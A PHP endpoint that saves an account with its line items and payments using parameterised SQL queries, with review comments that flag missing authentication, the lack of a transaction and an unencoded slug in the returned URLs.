Viewing: save-account.php
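<?php
/**
 * save-account.php: create or update an account and replace its line items
 * and payments.
 *
 * Reads a JSON document from the request body, recomputes the monetary totals
 * server-side, upserts the row in `accounts`, then deletes and re-inserts the
 * account's `account_items` and `payments` rows. The response is JSON.
 *
 * Every value taken from the request body is untrusted. All of it reaches SQL
 * only through bound parameters; the previous slug lookup and the two DELETEs
 * built their SQL by string interpolation.
 *
 * NOTE(review): no authentication or authorization check is visible in this
 * file. Confirm that db.php or the surrounding routing enforces one, because
 * the endpoint overwrites and deletes rows for whatever slug the caller sends.
 * NOTE(review): the upsert, the deletes and the re-inserts are not wrapped in
 * a transaction, so a failure part-way leaves the account without its
 * items/payments. Consider a transaction if the tables support it.
 */
header('Content-Type: application/json');
include 'db.php'; // expected to provide $conn (used below through the mysqli API)

// Emit a JSON error with the given HTTP status and stop. Messages stay
// generic so database details are never echoed back to the client.
$fail = function ($status, $message) {
    http_response_code($status);
    echo json_encode(["success" => false, "error" => $message]);
    exit;
};

// Read a scalar field as-is, or fall back to $default when it is absent or
// not a scalar (e.g. a nested array supplied where text is expected).
$text = function ($row, $key, $default = null) {
    return isset($row[$key]) && is_scalar($row[$key]) ? $row[$key] : $default;
};

// Read a numeric field; anything missing or non-numeric counts as 0 so that
// the arithmetic below cannot raise on attacker-chosen types.
$num = function ($row, $key) {
    return isset($row[$key]) && is_numeric($row[$key]) ? $row[$key] + 0 : 0;
};

$data = json_decode(file_get_contents("php://input"), true);

// Reject bodies that are not a JSON object or that lack a usable slug: the
// slug identifies the row that is overwritten and whose children are deleted.
if (
    !is_array($data)
    || !isset($data['slug'])
    || !(is_string($data['slug']) || is_int($data['slug']))
    || $data['slug'] === ''
) {
    $fail(400, "Invalid request body");
}

$slug     = $data['slug'];
$customer = $text($data, 'customerName');
$doc      = $text($data, 'docNumber');
$currency = $text($data, 'currency');
$status   = $text($data, 'status');
$notes    = $text($data, 'notes');
$type     = $text($data, 'type', 'cobro');

// Empty or missing dates are stored as NULL.
$rawStart  = $text($data, 'startDate');
$rawEnd    = $text($data, 'endDate');
$startDate = !empty($rawStart) ? $rawStart : null;
$endDate   = !empty($rawEnd) ? $rawEnd : null;

// Keep only well-formed (array) rows; a missing list is treated as empty.
$items = isset($data['items']) && is_array($data['items'])
    ? array_values(array_filter($data['items'], 'is_array'))
    : [];
$payments = isset($data['payments']) && is_array($data['payments'])
    ? array_values(array_filter($data['payments'], 'is_array'))
    : [];

// Totals are always recomputed here; client-supplied totals are never read.
$subtotal = 0;
$discount = 0;
$paid     = 0;

foreach ($items as $item) {
    $subtotal += $num($item, 'quantity') * $num($item, 'unitPrice');
    $discount += $num($item, 'discount');
}

$total = $subtotal - $discount;

foreach ($payments as $p) {
    $paid += $num($p, 'amount');
}

$balance = $total - $paid;

// Upsert the account row.
$stmt = $conn->prepare(
    "INSERT INTO accounts(
        slug, customer_name, doc_number, currency, status, notes,
        subtotal, discount_total, total, paid, balance,
        type, start_date, end_date
    ) VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?)
    ON DUPLICATE KEY UPDATE
        customer_name=VALUES(customer_name),
        doc_number=VALUES(doc_number),
        currency=VALUES(currency),
        status=VALUES(status),
        notes=VALUES(notes),
        subtotal=VALUES(subtotal),
        discount_total=VALUES(discount_total),
        total=VALUES(total),
        paid=VALUES(paid),
        balance=VALUES(balance),
        type=VALUES(type),
        start_date=VALUES(start_date),
        end_date=VALUES(end_date)"
);
if ($stmt === false) {
    $fail(500, "Could not save account");
}
$stmt->bind_param(
    "ssssssdddddsss",
    $slug, $customer, $doc, $currency, $status, $notes,
    $subtotal, $discount, $total, $paid, $balance,
    $type, $startDate, $endDate
);
if (!$stmt->execute()) {
    $fail(500, "Could not save account");
}

// insert_id is 0 when the statement did not insert a new row, so fall back to
// looking the id up by slug. The slug is bound, never interpolated.
$accountId = $conn->insert_id;
if ($accountId == 0) {
    $lookup = $conn->prepare("SELECT id FROM accounts WHERE slug=?");
    if ($lookup === false) {
        $fail(500, "Could not save account");
    }
    $lookup->bind_param("s", $slug);
    $lookup->execute();
    $lookup->bind_result($foundId);
    $accountId = $lookup->fetch() ? $foundId : 0;
    $lookup->close();
}

// Never run the child-row deletes without a resolved account id.
$accountId = (int) $accountId;
if ($accountId <= 0) {
    $fail(500, "Could not save account");
}

// Replace the account's child rows: delete everything, then re-insert.
$clearItems    = $conn->prepare("DELETE FROM account_items WHERE account_id=?");
$clearPayments = $conn->prepare("DELETE FROM payments WHERE account_id=?");
if ($clearItems === false || $clearPayments === false) {
    $fail(500, "Could not save account");
}
$clearItems->bind_param("i", $accountId);
$clearItems->execute();
$clearPayments->bind_param("i", $accountId);
$clearPayments->execute();

// Prepared once and executed per row.
$stmt2 = $conn->prepare(
    "INSERT INTO account_items(
        account_id, quantity, description, unit_price, discount_amount, total
    ) VALUES(?,?,?,?,?,?)"
);
if ($stmt2 === false) {
    $fail(500, "Could not save account");
}
foreach ($items as $item) {
    $quantity       = $num($item, 'quantity');
    $description    = $text($item, 'description');
    $unitPrice      = $num($item, 'unitPrice');
    $discountAmount = $num($item, 'discount');
    $lineTotal      = ($quantity * $unitPrice) - $discountAmount;

    $stmt2->bind_param(
        "idsddd",
        $accountId, $quantity, $description, $unitPrice, $discountAmount, $lineTotal
    );
    $stmt2->execute();
}

$stmt3 = $conn->prepare(
    "INSERT INTO payments(
        account_id, payment_date, amount, note
    ) VALUES(?,?,?,?)"
);
if ($stmt3 === false) {
    $fail(500, "Could not save account");
}
foreach ($payments as $payment) {
    $date   = $text($payment, 'date');
    $amount = $num($payment, 'amount');
    $note   = $text($payment, 'note');

    $stmt3->bind_param("isds", $accountId, $date, $amount, $note);
    $stmt3->execute();
}

// NOTE(review): the slug is concatenated into these URLs unencoded, exactly as
// before; confirm the consumer encodes it or restrict the slug's characters.
$pdfUrl = "api/generate-pdf.php?slug=".$slug;

$response = [
    "success" => true,
    "slug" => $slug,
    "pdf" => $pdfUrl,
    "url" => "cobro/".$slug
];

echo json_encode($response);
?>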